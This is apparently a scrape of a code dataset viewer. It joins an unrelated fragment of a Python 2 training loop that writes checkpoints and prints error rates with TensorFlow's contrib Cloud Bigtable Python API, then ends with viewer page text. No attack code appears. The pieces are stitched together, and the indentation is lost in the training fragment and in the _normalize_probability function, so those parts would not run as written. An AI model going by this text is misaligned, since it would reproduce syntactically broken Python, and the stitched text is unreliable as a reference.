# sys.stdout.write(' %s %.3f' % (e.name, e.params['weight'].euclid_norm()))
sys.stdout.write('\n')
if self.SaveNow(step):
self.t_op.current_step = step
self.CopyModelToCPU()
util.WriteCheckpointFile(self.net, self.t_op)
if dump_best:
dump_best = False
if select_model_using_error:
print 'Best valid error : %.4f Test error %.4f' % (best_valid_error, test_error)
elif select_model_using_acc:
print 'Best valid acc : %.4f Test acc %.4f' % (1-best_valid_error, 1-test_error)
elif select_model_using_map:
print 'Best valid MAP : %.4f Test MAP %.4f' % (1-best_valid_error, 1-test_error)
util.WriteCheckpointFile(best_net, best_t_op, best=True)
stop = self.TrainStopCondition(step)
| |
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""The Python API for TensorFlow's Cloud Bigtable integration.
TensorFlow has support for reading from and writing to Cloud Bigtable. To use
TensorFlow + Cloud Bigtable integration, first create a BigtableClient to
configure your connection to Cloud Bigtable, and then create a BigtableTable
object to allow you to create numerous `tf.data.Dataset`s to read data, or
write a `tf.data.Dataset` object to the underlying Cloud Bigtable table.
For background on Cloud Bigtable, see: https://cloud.google.com/bigtable .
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from six import iteritems
from six import string_types
from tensorflow.contrib.bigtable.ops import gen_bigtable_ops
from tensorflow.contrib.data.python.ops import interleave_ops
from tensorflow.contrib.util import loader
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.data.util import nest
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.platform import resource_loader
# Load the custom `_bigtable.so` shared library shipped next to this file so
# that the generated op wrappers in `gen_bigtable_ops` resolve to registered
# kernels at graph-construction time.
_bigtable_so = loader.load_op_library(
    resource_loader.get_path_to_datafile("_bigtable.so"))
class BigtableClient(object):
  """BigtableClient is the entrypoint for interacting with Cloud Bigtable in TF.

  BigtableClient encapsulates a connection to Cloud Bigtable, and exposes the
  `table` method to open a Bigtable table.
  """

  def __init__(self,
               project_id,
               instance_id,
               connection_pool_size=None,
               max_receive_message_size=None):
    """Creates a BigtableClient that can be used to open connections to tables.

    Args:
      project_id: A string representing the GCP project id to connect to.
      instance_id: A string representing the Bigtable instance to connect to.
      connection_pool_size: (Optional.) A number representing the number of
        concurrent connections to the Cloud Bigtable service to make.
      max_receive_message_size: (Optional.) The maximum bytes received in a
        single gRPC response.

    Raises:
      ValueError: if the arguments are invalid (e.g. wrong type, or out of
        expected ranges (e.g. negative).)
    """
    # Use `string_types` (not `str`) so Python 2 `unicode` ids are accepted,
    # consistent with the column validation in `_normalize_columns` below.
    if not isinstance(project_id, string_types):
      raise ValueError("`project_id` must be a string")
    self._project_id = project_id
    if not isinstance(instance_id, string_types):
      raise ValueError("`instance_id` must be a string")
    self._instance_id = instance_id
    # -1 tells the underlying op to use its default for these settings.
    if connection_pool_size is None:
      connection_pool_size = -1
    elif connection_pool_size < 1:
      raise ValueError("`connection_pool_size` must be positive")
    if max_receive_message_size is None:
      max_receive_message_size = -1
    elif max_receive_message_size < 1:
      raise ValueError("`max_receive_message_size` must be positive")
    self._connection_pool_size = connection_pool_size
    self._resource = gen_bigtable_ops.bigtable_client(
        project_id, instance_id, connection_pool_size, max_receive_message_size)

  def table(self, name, snapshot=None):
    """Opens a table and returns a `tf.contrib.bigtable.BigtableTable` object.

    Args:
      name: A `tf.string` `tf.Tensor` name of the table to open.
      snapshot: Either a `tf.string` `tf.Tensor` snapshot id, or `True` to
        request the creation of a snapshot. (Note: currently unimplemented.)

    Returns:
      A `tf.contrib.bigtable.BigtableTable` Python object representing the
      operations available on the table.
    """
    # TODO(saeta): Implement snapshot functionality.
    table = gen_bigtable_ops.bigtable_table(self._resource, name)
    return BigtableTable(name, snapshot, table)
class BigtableTable(object):
  """BigtableTable is the entrypoint for reading and writing data in Cloud
  Bigtable.

  This BigtableTable class is the Python representation of the Cloud Bigtable
  table within TensorFlow. Methods on this class allow data to be read from and
  written to the Cloud Bigtable service in flexible and high performance
  manners.
  """

  # TODO(saeta): Investigate implementing tf.contrib.lookup.LookupInterface.
  # TODO(saeta): Consider variant tensors instead of resources (while supporting
  # connection pooling).

  def __init__(self, name, snapshot, resource):
    self._name = name
    self._snapshot = snapshot
    self._resource = resource

  def lookup_columns(self, *args, **kwargs):
    """Retrieves the values of columns for a dataset of keys.

    Example usage:

    ```python
    table = bigtable_client.table("my_table")
    key_dataset = table.get_keys_prefix("imagenet")
    images = key_dataset.apply(table.lookup_columns(("cf1", "image"),
                                                    ("cf2", "label"),
                                                    ("cf2", "boundingbox")))
    training_data = images.map(parse_and_crop, num_parallel_calls=64).batch(128)
    ```

    Alternatively, you can use keyword arguments to specify the columns to
    capture. Example (same as above, rewritten):

    ```python
    table = bigtable_client.table("my_table")
    key_dataset = table.get_keys_prefix("imagenet")
    images = key_dataset.apply(table.lookup_columns(
        cf1="image", cf2=("label", "boundingbox")))
    training_data = images.map(parse_and_crop, num_parallel_calls=64).batch(128)
    ```

    Note: certain `kwargs` keys are reserved, and thus, some column families
    cannot be identified using the `kwargs` syntax. Instead, please use the
    `args` syntax. This list includes:
      - 'name'

    Note: this list can change at any time.

    Args:
      *args: A list of tuples containing (column family, column name) pairs.
      **kwargs: Column families (keys) and column qualifiers (values).

    Returns:
      A function that can be passed to `tf.data.Dataset.apply` to retrieve the
      values of columns for the rows.
    """
    table = self  # Capture self
    # `args` is always a tuple (possibly empty); copy it into a list so the
    # kwargs-specified columns can be appended.
    normalized = list(args)
    for key, value in iteritems(kwargs):
      if key == "name":
        continue
      # Use `string_types` (not `str`) so Python 2 `unicode` qualifiers are
      # accepted, consistent with `_normalize_columns`.
      if isinstance(value, string_types):
        normalized.append((key, value))
        continue
      for col in value:
        normalized.append((key, col))

    def _apply_fn(dataset):
      # TODO(saeta): Verify dataset's types are correct!
      return _BigtableLookupDataset(dataset, table, normalized)

    return _apply_fn

  def keys_by_range_dataset(self, start, end):
    """Retrieves all row keys between start and end.

    Note: it does NOT retrieve the values of columns.

    Args:
      start: The start row key. The row keys for rows after start (inclusive)
        will be retrieved.
      end: (Optional.) The end row key. Rows up to (but not including) end will
        be retrieved. If end is None, all subsequent row keys will be retrieved.

    Returns:
      A `tf.data.Dataset` containing `tf.string` Tensors corresponding to all
      of the row keys between `start` and `end`.
    """
    # TODO(saeta): Make inclusive / exclusive configurable?
    if end is None:
      end = ""
    return _BigtableRangeKeyDataset(self, start, end)

  def keys_by_prefix_dataset(self, prefix):
    """Retrieves the row keys matching a given prefix.

    Args:
      prefix: All row keys that begin with `prefix` in the table will be
        retrieved.

    Returns:
      A `tf.data.Dataset`. containing `tf.string` Tensors corresponding to all
      of the row keys matching that prefix.
    """
    return _BigtablePrefixKeyDataset(self, prefix)

  def sample_keys(self):
    """Retrieves a sampling of row keys from the Bigtable table.

    This dataset is most often used in conjunction with
    `tf.contrib.data.parallel_interleave` to construct a set of ranges for
    scanning in parallel.

    Returns:
      A `tf.data.Dataset` returning string row keys.
    """
    return _BigtableSampleKeysDataset(self)

  def scan_prefix(self, prefix, probability=None, columns=None, **kwargs):
    """Retrieves row (including values) from the Bigtable service.

    Rows with row-key prefixed by `prefix` will be retrieved.

    Specifying the columns to retrieve for each row is done by either using
    kwargs or in the columns parameter. To retrieve values of the columns "c1",
    and "c2" from the column family "cfa", and the value of the column "c3"
    from column family "cfb", the following datasets (`ds1`, and `ds2`) are
    equivalent:

    ```
    table = # ...
    ds1 = table.scan_prefix("row_prefix", columns=[("cfa", "c1"),
                                                   ("cfa", "c2"),
                                                   ("cfb", "c3")])
    ds2 = table.scan_prefix("row_prefix", cfa=["c1", "c2"], cfb="c3")
    ```

    Note: only the latest value of a cell will be retrieved.

    Args:
      prefix: The prefix all row keys must match to be retrieved for prefix-
        based scans.
      probability: (Optional.) A float between 0 (exclusive) and 1 (inclusive).
        A non-1 value indicates to probabilistically sample rows with the
        provided probability.
      columns: The columns to read. Note: most commonly, they are expressed as
        kwargs. Use the columns value if you are using column families that are
        reserved. The value of columns and kwargs are merged. Columns is a list
        of tuples of strings ("column_family", "column_qualifier").
      **kwargs: The column families and columns to read. Keys are treated as
        column_families, and values can be either lists of strings, or strings
        that are treated as the column qualifier (column name).

    Returns:
      A `tf.data.Dataset` returning the row keys and the cell contents.

    Raises:
      ValueError: If the configured probability is unexpected.
    """
    probability = _normalize_probability(probability)
    normalized = _normalize_columns(columns, kwargs)
    return _BigtableScanDataset(self, prefix, "", "", normalized, probability)

  def scan_range(self, start, end, probability=None, columns=None, **kwargs):
    """Retrieves rows (including values) from the Bigtable service.

    Rows with row-keys between `start` and `end` will be retrieved.

    Specifying the columns to retrieve for each row is done by either using
    kwargs or in the columns parameter. To retrieve values of the columns "c1",
    and "c2" from the column family "cfa", and the value of the column "c3"
    from column family "cfb", the following datasets (`ds1`, and `ds2`) are
    equivalent:

    ```
    table = # ...
    ds1 = table.scan_range("row_start", "row_end", columns=[("cfa", "c1"),
                                                            ("cfa", "c2"),
                                                            ("cfb", "c3")])
    ds2 = table.scan_range("row_start", "row_end", cfa=["c1", "c2"], cfb="c3")
    ```

    Note: only the latest value of a cell will be retrieved.

    Args:
      start: The start of the range when scanning by range.
      end: (Optional.) The end of the range when scanning by range.
      probability: (Optional.) A float between 0 (exclusive) and 1 (inclusive).
        A non-1 value indicates to probabilistically sample rows with the
        provided probability.
      columns: The columns to read. Note: most commonly, they are expressed as
        kwargs. Use the columns value if you are using column families that are
        reserved. The value of columns and kwargs are merged. Columns is a list
        of tuples of strings ("column_family", "column_qualifier").
      **kwargs: The column families and columns to read. Keys are treated as
        column_families, and values can be either lists of strings, or strings
        that are treated as the column qualifier (column name).

    Returns:
      A `tf.data.Dataset` returning the row keys and the cell contents.

    Raises:
      ValueError: If the configured probability is unexpected.
    """
    probability = _normalize_probability(probability)
    normalized = _normalize_columns(columns, kwargs)
    return _BigtableScanDataset(self, "", start, end, normalized, probability)

  def parallel_scan_prefix(self,
                           prefix,
                           num_parallel_scans=None,
                           probability=None,
                           columns=None,
                           **kwargs):
    """Retrieves row (including values) from the Bigtable service at high speed.

    Rows with row-key prefixed by `prefix` will be retrieved. This method is
    similar to `scan_prefix`, but by contrast performs multiple sub-scans in
    parallel in order to achieve higher performance.

    Note: The dataset produced by this method is not deterministic!

    Specifying the columns to retrieve for each row is done by either using
    kwargs or in the columns parameter. To retrieve values of the columns "c1",
    and "c2" from the column family "cfa", and the value of the column "c3"
    from column family "cfb", the following datasets (`ds1`, and `ds2`) are
    equivalent:

    ```
    table = # ...
    ds1 = table.parallel_scan_prefix("row_prefix", columns=[("cfa", "c1"),
                                                            ("cfa", "c2"),
                                                            ("cfb", "c3")])
    ds2 = table.parallel_scan_prefix("row_prefix", cfa=["c1", "c2"], cfb="c3")
    ```

    Note: only the latest value of a cell will be retrieved.

    Args:
      prefix: The prefix all row keys must match to be retrieved for prefix-
        based scans.
      num_parallel_scans: (Optional.) The number of concurrent scans against the
        Cloud Bigtable instance.
      probability: (Optional.) A float between 0 (exclusive) and 1 (inclusive).
        A non-1 value indicates to probabilistically sample rows with the
        provided probability.
      columns: The columns to read. Note: most commonly, they are expressed as
        kwargs. Use the columns value if you are using column families that are
        reserved. The value of columns and kwargs are merged. Columns is a list
        of tuples of strings ("column_family", "column_qualifier").
      **kwargs: The column families and columns to read. Keys are treated as
        column_families, and values can be either lists of strings, or strings
        that are treated as the column qualifier (column name).

    Returns:
      A `tf.data.Dataset` returning the row keys and the cell contents.

    Raises:
      ValueError: If the configured probability is unexpected.
    """
    probability = _normalize_probability(probability)
    normalized = _normalize_columns(columns, kwargs)
    ds = _BigtableSampleKeyPairsDataset(self, prefix, "", "")
    return self._make_parallel_scan_dataset(ds, num_parallel_scans, probability,
                                            normalized)

  def parallel_scan_range(self,
                          start,
                          end,
                          num_parallel_scans=None,
                          probability=None,
                          columns=None,
                          **kwargs):
    """Retrieves rows (including values) from the Bigtable service.

    Rows with row-keys between `start` and `end` will be retrieved. This method
    is similar to `scan_range`, but by contrast performs multiple sub-scans in
    parallel in order to achieve higher performance.

    Note: The dataset produced by this method is not deterministic!

    Specifying the columns to retrieve for each row is done by either using
    kwargs or in the columns parameter. To retrieve values of the columns "c1",
    and "c2" from the column family "cfa", and the value of the column "c3"
    from column family "cfb", the following datasets (`ds1`, and `ds2`) are
    equivalent:

    ```
    table = # ...
    ds1 = table.parallel_scan_range("row_start",
                                    "row_end",
                                    columns=[("cfa", "c1"),
                                             ("cfa", "c2"),
                                             ("cfb", "c3")])
    ds2 = table.parallel_scan_range("row_start", "row_end",
                                    cfa=["c1", "c2"], cfb="c3")
    ```

    Note: only the latest value of a cell will be retrieved.

    Args:
      start: The start of the range when scanning by range.
      end: (Optional.) The end of the range when scanning by range.
      num_parallel_scans: (Optional.) The number of concurrent scans against the
        Cloud Bigtable instance.
      probability: (Optional.) A float between 0 (exclusive) and 1 (inclusive).
        A non-1 value indicates to probabilistically sample rows with the
        provided probability.
      columns: The columns to read. Note: most commonly, they are expressed as
        kwargs. Use the columns value if you are using column families that are
        reserved. The value of columns and kwargs are merged. Columns is a list
        of tuples of strings ("column_family", "column_qualifier").
      **kwargs: The column families and columns to read. Keys are treated as
        column_families, and values can be either lists of strings, or strings
        that are treated as the column qualifier (column name).

    Returns:
      A `tf.data.Dataset` returning the row keys and the cell contents.

    Raises:
      ValueError: If the configured probability is unexpected.
    """
    probability = _normalize_probability(probability)
    normalized = _normalize_columns(columns, kwargs)
    ds = _BigtableSampleKeyPairsDataset(self, "", start, end)
    return self._make_parallel_scan_dataset(ds, num_parallel_scans, probability,
                                            normalized)

  def write(self, dataset, column_families, columns, timestamp=None):
    """Writes a dataset to the table.

    Args:
      dataset: A `tf.data.Dataset` to be written to this table. It must produce
        a list of number-of-columns+1 elements, all of which must be strings.
        The first value will be used as the row key, and subsequent values will
        be used as cell values for the corresponding columns from the
        corresponding column_families and columns entries.
      column_families: A `tf.Tensor` of `tf.string`s corresponding to the
        column names to store the dataset's elements into.
      columns: A `tf.Tensor` of `tf.string`s corresponding to the column names
        to store the dataset's elements into.
      timestamp: (Optional.) An int64 timestamp to write all the values at.
        Leave as None to use server-provided timestamps.

    Returns:
      A `tf.Operation` that can be run to perform the write.

    Raises:
      ValueError: If there are unexpected or incompatible types, or if the
        number of columns and column_families does not match the output of
        `dataset`.
    """
    if timestamp is None:
      timestamp = -1  # Bigtable server provided timestamp.
    for tensor_type in nest.flatten(dataset.output_types):
      if tensor_type != dtypes.string:
        raise ValueError("Not all elements of the dataset were `tf.string`")
    for shape in nest.flatten(dataset.output_shapes):
      if not shape.is_compatible_with(tensor_shape.scalar()):
        raise ValueError("Not all elements of the dataset were scalars")
    if len(column_families) != len(columns):
      raise ValueError("len(column_families) != len(columns)")
    if len(nest.flatten(dataset.output_types)) != len(columns) + 1:
      raise ValueError("A column name must be specified for every component of "
                       "the dataset elements. (e.g.: len(columns) != "
                       "len(dataset.output_types))")
    return gen_bigtable_ops.dataset_to_bigtable(
        self._resource,
        dataset._as_variant_tensor(),  # pylint: disable=protected-access
        column_families,
        columns,
        timestamp)

  def _make_parallel_scan_dataset(self, ds, num_parallel_scans,
                                  normalized_probability, normalized_columns):
    """Builds a parallel dataset from a given range.

    Args:
      ds: A `_BigtableSampleKeyPairsDataset` returning ranges of keys to use.
      num_parallel_scans: The number of concurrent parallel scans to use.
      normalized_probability: A number between 0 and 1 for the keep probability.
      normalized_columns: The column families and column qualifiers to retrieve.

    Returns:
      A `tf.data.Dataset` representing the result of the parallel scan.
    """
    if num_parallel_scans is None:
      num_parallel_scans = 50

    ds = ds.shuffle(buffer_size=10000)  # TODO(saeta): Make configurable.

    def _interleave_fn(start, end):
      return _BigtableScanDataset(
          self,
          prefix="",
          start=start,
          end=end,
          normalized=normalized_columns,
          probability=normalized_probability)

    # Note prefetch_input_elements must be set in order to avoid rpc timeouts.
    ds = ds.apply(
        interleave_ops.parallel_interleave(
            _interleave_fn,
            cycle_length=num_parallel_scans,
            sloppy=True,
            prefetch_input_elements=1))
    return ds
def _normalize_probability(probability):
if probability is None:
probability = 1.0
if isinstance(probability, float) and (probability <= 0.0 or
probability > 1.0):
raise ValueError("probability must be in the range (0, 1].")
return probability
def _normalize_columns(columns, provided_kwargs):
  """Converts arguments (columns, and kwargs dict) to C++ representation.

  Args:
    columns: a datastructure containing the column families and qualifier to
      retrieve. Valid types include (1) None, (2) list of tuples, (3) a tuple
      of two strings representing a single (family, qualifier) pair, and (4) a
      tuple of (family, qualifier) tuples.
    provided_kwargs: a dictionary containing the column families and qualifiers
      to retrieve

  Returns:
    A list of pairs of column family+qualifier to retrieve.

  Raises:
    ValueError: If there are no cells to retrieve or the columns are in an
      incorrect format.
  """
  normalized = columns
  if normalized is None:
    normalized = []
  if isinstance(normalized, tuple):
    # Disambiguate a single ("family", "qualifier") pair from a tuple of
    # pairs: previously a tuple of exactly two pairs was silently wrapped as
    # one malformed (family, qualifier) entry.
    if len(normalized) == 2 and all(
        isinstance(item, string_types) for item in normalized):
      normalized = [normalized]
    elif all(isinstance(item, tuple) for item in normalized):
      normalized = list(normalized)
    else:
      raise ValueError("columns was a tuple of inappropriate length")
  for key, value in iteritems(provided_kwargs):
    if key == "name":
      # "name" is reserved (it collides with the op's name kwarg).
      continue
    if isinstance(value, string_types):
      normalized.append((key, value))
      continue
    for col in value:
      normalized.append((key, col))
  if not normalized:
    raise ValueError("At least one column + column family must be specified.")
  return normalized
class _BigtableKeyDataset(dataset_ops.DatasetSource):
  """Abstract base for datasets that emit row keys of a Bigtable table."""

  def __init__(self, table):
    """Constructs a _BigtableKeyDataset.

    Args:
      table: a Bigtable class.
    """
    super(_BigtableKeyDataset, self).__init__()
    self._table = table

  # Every key dataset yields one scalar string tensor (a row key) per element.
  @property
  def output_types(self):
    return dtypes.string

  @property
  def output_shapes(self):
    return tensor_shape.TensorShape([])

  @property
  def output_classes(self):
    return ops.Tensor
class _BigtablePrefixKeyDataset(_BigtableKeyDataset):
  """Emits every row key in the table that begins with a given prefix."""

  def __init__(self, table, prefix):
    super(_BigtablePrefixKeyDataset, self).__init__(table)
    self._prefix = prefix

  def _as_variant_tensor(self):
    # pylint: disable=protected-access
    return gen_bigtable_ops.bigtable_prefix_key_dataset(
        prefix=self._prefix, table=self._table._resource)
class _BigtableRangeKeyDataset(_BigtableKeyDataset):
  """Emits the row keys falling between a start key and an end key."""

  def __init__(self, table, start, end):
    super(_BigtableRangeKeyDataset, self).__init__(table)
    self._start = start
    self._end = end

  def _as_variant_tensor(self):
    # pylint: disable=protected-access
    return gen_bigtable_ops.bigtable_range_key_dataset(
        start_key=self._start,
        end_key=self._end,
        table=self._table._resource)
class _BigtableSampleKeysDataset(_BigtableKeyDataset):
  """Emits a sampling of the row keys present in the table."""

  # TODO(saeta): Expose the data size offsets into the keys.

  def __init__(self, table):
    super(_BigtableSampleKeysDataset, self).__init__(table)

  def _as_variant_tensor(self):
    # pylint: disable=protected-access
    return gen_bigtable_ops.bigtable_sample_keys_dataset(
        table=self._table._resource)
class _BigtableLookupDataset(dataset_ops.DatasetSource):
  """_BigtableLookupDataset represents a dataset that retrieves values for keys.

  Each element is a tuple of scalar strings: the row key followed by one value
  per requested (column family, column qualifier) pair.
  """

  def __init__(self, dataset, table, normalized):
    """Constructs a _BigtableLookupDataset.

    Args:
      dataset: a `tf.data.Dataset` producing scalar string row keys to look up.
      table: the `BigtableTable` to read from.
      normalized: a list of (column_family, column_qualifier) string pairs.
    """
    # Call the base initializer for consistency with _BigtableKeyDataset.
    super(_BigtableLookupDataset, self).__init__()
    self._num_outputs = len(normalized) + 1  # 1 for row key
    self._dataset = dataset
    self._table = table
    self._normalized = normalized
    self._column_families = [i[0] for i in normalized]
    self._columns = [i[1] for i in normalized]

  @property
  def output_classes(self):
    return tuple([ops.Tensor] * self._num_outputs)

  @property
  def output_shapes(self):
    return tuple([tensor_shape.TensorShape([])] * self._num_outputs)

  @property
  def output_types(self):
    return tuple([dtypes.string] * self._num_outputs)

  def _as_variant_tensor(self):
    # pylint: disable=protected-access
    return gen_bigtable_ops.bigtable_lookup_dataset(
        keys_dataset=self._dataset._as_variant_tensor(),
        table=self._table._resource,
        column_families=self._column_families,
        columns=self._columns)
class _BigtableScanDataset(dataset_ops.DatasetSource):
  """_BigtableScanDataset represents a dataset that retrieves keys and values.

  Each element is a tuple of scalar strings: the row key followed by one value
  per requested (column family, column qualifier) pair.
  """

  def __init__(self, table, prefix, start, end, normalized, probability):
    """Constructs a _BigtableScanDataset.

    Args:
      table: the `BigtableTable` to read from.
      prefix: row-key prefix for prefix scans ("" when scanning by range).
      start: start row key for range scans ("" when scanning by prefix).
      end: end row key for range scans ("" when scanning by prefix).
      normalized: a list of (column_family, column_qualifier) string pairs.
      probability: the normalized keep probability in (0, 1].
    """
    # Call the base initializer for consistency with _BigtableKeyDataset.
    super(_BigtableScanDataset, self).__init__()
    self._table = table
    self._prefix = prefix
    self._start = start
    self._end = end
    self._column_families = [i[0] for i in normalized]
    self._columns = [i[1] for i in normalized]
    self._probability = probability
    self._num_outputs = len(normalized) + 1  # 1 for row key

  @property
  def output_classes(self):
    return tuple([ops.Tensor] * self._num_outputs)

  @property
  def output_shapes(self):
    return tuple([tensor_shape.TensorShape([])] * self._num_outputs)

  @property
  def output_types(self):
    return tuple([dtypes.string] * self._num_outputs)

  def _as_variant_tensor(self):
    # pylint: disable=protected-access
    return gen_bigtable_ops.bigtable_scan_dataset(
        table=self._table._resource,
        prefix=self._prefix,
        start_key=self._start,
        end_key=self._end,
        column_families=self._column_families,
        columns=self._columns,
        probability=self._probability)
class _BigtableSampleKeyPairsDataset(dataset_ops.DatasetSource):
  """_BigtableSampleKeyPairsDataset returns key pairs from a Bigtable table.

  Each element is a (start_key, end_key) pair of scalar strings describing a
  sub-range of the table, suitable for driving parallel sub-scans.
  """

  def __init__(self, table, prefix, start, end):
    """Constructs a _BigtableSampleKeyPairsDataset.

    Args:
      table: the `BigtableTable` to sample key ranges from.
      prefix: row-key prefix for prefix scans ("" when scanning by range).
      start: start row key for range scans ("" when scanning by prefix).
      end: end row key for range scans ("" when scanning by prefix).
    """
    # Call the base initializer for consistency with _BigtableKeyDataset.
    super(_BigtableSampleKeyPairsDataset, self).__init__()
    self._table = table
    self._prefix = prefix
    self._start = start
    self._end = end

  @property
  def output_classes(self):
    return (ops.Tensor, ops.Tensor)

  @property
  def output_shapes(self):
    return (tensor_shape.TensorShape([]), tensor_shape.TensorShape([]))

  @property
  def output_types(self):
    return (dtypes.string, dtypes.string)

  def _as_variant_tensor(self):
    # pylint: disable=protected-access
    return gen_bigtable_ops.bigtable_sample_key_pairs_dataset(
        table=self._table._resource,
        prefix=self._prefix,
        start_key=self._start,
        end_key=self._end)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.